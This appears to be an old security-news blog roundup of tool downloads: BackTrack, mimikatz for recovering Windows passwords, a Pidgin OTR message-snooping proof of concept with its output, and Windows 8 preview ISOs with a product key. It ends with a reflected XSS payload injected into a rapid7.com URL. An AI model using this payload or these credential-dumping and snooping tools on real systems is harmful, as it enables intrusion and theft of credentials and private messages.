Backtrack 5 R2 finally released with bug fixes, upgrades, and the addition of 42 new tools. With the best custom-built 3.2.6 kernel, the best wireless support available at maximum speed. This release have included Metasploit 4.2.0 Community Edition, version 3.0 of the Social Engineer Toolkit, BeEF 0.4.3.2, and many other tool upgrades.

Download
http://www.backtrack-linux.org/downloads/

Security Analyzer is a free program for the Windows operating system to assess the system’s security status. The application works in some regards identical to Microsoft’s Action Center control panel applet. Unlike Microsoft’s built-in tool, it provides additional information and options to see if the system is protected properly.

Download
http://www.itknowledge24.com/downloads/p

Ocster Backup Pro is a fully automatic backup solution that supports full PC backup (image backup), file backup, email backup (Outlook, Thunderbird), browser backup (Firefox, Chrome, Internet Explorer), contacts backup. The application is very easy-to-use and includes wizard that guides users with no knowledge or new to backup programs to perform the desired tasks effectively. Backup performed by Ocster Backup pro can be stored on local drives, removable drives or on secure Ocster backup servers.

Info:
Visit promo page
https://www.ocster.com/unlock/obp7/en?edt=cbde11a
Enter your details
You will receive a confirmation mail

brEWS (Basic Request Embedded Web Server Scanner) was designed to provide a simple web based tool to scan networks and identify Embedded Web Servers (EWSs). While there is no universally accepted definition, for our purposes, we define an EWS as follows:

Web server installed on the hardware during the manufacturing process (not an optional component)
Not designed for high performance
Limited functionality
Serves as an administrative interface to the host hardware

Info
http://brews.zscaler.com/getheaders.php

Download ISO-Images
Englisch

64-Bit (x64) (3,1 GB) Sha 1 Hash – 1288519C5035BCAC83CBFA23A33038CCF5522749
http://iso.esd.microsoft.com/WCPDL/BD1B8A49393E30CC9C4E5C88457D73E964F1F3B18/Windows8-ConsumerPreview-64bit-English.iso

32-Bit (x86) (2,3 GB) Sha 1 Mash – E91ED665B01A46F4344C36D9D88C8BF78E9A1B39
http://iso.esd.microsoft.com/WCPDL/BD1B8A49393E30CC9C4E5C88457D73E964F1F3B18/Windows8-ConsumerPreview-32bit-English.iso

Product Key: DNJXJ-7XBW8-2378T-X22TX-BKG7J

Sandcat Browser includes the following pen-test oriented features:

Live HTTP Headers
Request Editor extension
Fuzzer extension with multiple modes and support for filters
JavaScript Executor extension -- allows you to load and run external JavaScript files
Lua Executor extension -- allows you to load and run external Lua scripts
Syhunt Gelo
HTTP Brute Force, CGI Scanner scripts and more.

Download
http://www.syhunt.com/?n=Sandcat.Browser

Cross-platform tool to analyze the configuration of SSL servers.
Supports cipher suites scanning, insecure renegotiation verification, session resumption testing, client certificates, and more...
Tested on Python 2.6 & 2.7, and Ubuntu and Windows 7, both 32 and 64 bits. Based on OpenSSL and a custom Python wrapper.
Contact: sslyze /at/ isecpartners \dot\ com


Download
http://code.google.com/p/sslyze/downloads/list

Tool To Recover Cleartext Passwords From Lsass. It was possible to recover the cleartext passwords of logged on windows users.

Download
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.7z
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip

Details
libpurple is an Instant Messaging (IM) library developed by the Pidgin project. It is used by a number of IM clients including Pidgin and Adium. libpurple-based clients support the OTR (“Off-the-Record”) protocol either natively or via a plugin. The OTR messaging protocol enables users to communicate securely over any IM network.

pidgin-otr-snooping.py is a proof-of-concept Python script that connects to DBUS and prints all messages received via Pidgin’s “ReceivedImMsg” and “WroteImMsg” signals. The example below shows messages transmitted during an OTR conversation:
user@host:~$ python pidgin-otr-snooping.py
sent 'hey' to user1@example.com
received 'ho' from user1@example.com
sent 'lets go!' to user1@example.com
An exploited application that connects to DBUS (or reuses an already established connection) to listen for private messages provides identical forensic evidence (logs) as any application that connects to DBUS for legitimate purposes. It is thus difficult to identify in-memory eavesdropping of this sort, especially in cases where there is no supportive evidence that might suggest it (offending process image, related traffic logs etc.).

Download pidgin-otr-snooping.py
http://census-labs.com/media/pidgin-otr-snooping.py.txt

by
Dimitris Glynos

The fastest smartphone is here. The Ascend D Quad features a 4.5inch HD screen, 8MP BSI camera, Dolby surround audio, 1800/2500mAh battery with 30% power saving technology and 1.5GHz quad-core processor

Homepage
http://www.rapid7.com/

XSS
URL:
hxxps://www.rapid7.com/register/metasploit-trial-key.jsp?product=Metasploit+Pro&returnPathURL=https:
//localhost:3790/setup/activation' onmouseover=alert(/Black.Spook/) bad='&whence=

by
black.spook